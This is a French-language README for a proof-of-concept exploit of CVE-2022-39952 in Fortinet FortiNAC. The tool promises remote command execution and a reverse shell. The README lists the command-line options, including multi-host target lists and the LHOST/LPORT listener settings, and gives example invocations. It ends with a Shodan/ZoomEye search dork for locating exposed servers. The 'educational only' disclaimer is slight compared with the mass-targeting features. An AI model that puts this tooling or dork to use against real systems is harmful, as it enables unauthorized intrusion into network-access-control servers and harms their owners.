
Preuve de concept d'exploitation pour CVE-2022-39952 ciblant Fortinet FortiNAC, permettant l'exécution de commandes à distance et un reverse shell sur les serveurs vulnérables.
Cet exploit permet à un attaquant d'exécuter des commandes arbitraires sur le serveur FortiNAC. Il est basé sur le PoC développé par horizon3ai, avec des options supplémentaires pour cibler plusieurs hôtes.
Avertissement : Cet exploit est uniquement à des fins éducatives. Veuillez l'utiliser de manière responsable et avec autorisation.
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
Pour utiliser cet exploit, vous devez avoir Python 3.x installé sur votre système.
Python 3.x
module requests
module concurrent.futures
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
Cet exploit n'a été testé que sur un nombre limité de cibles, son efficacité peut donc varier. Le dork pour trouver des cibles potentielles sur ZoomEye et Shodan est :
title:"FortiNAC" +"JSESSIONID"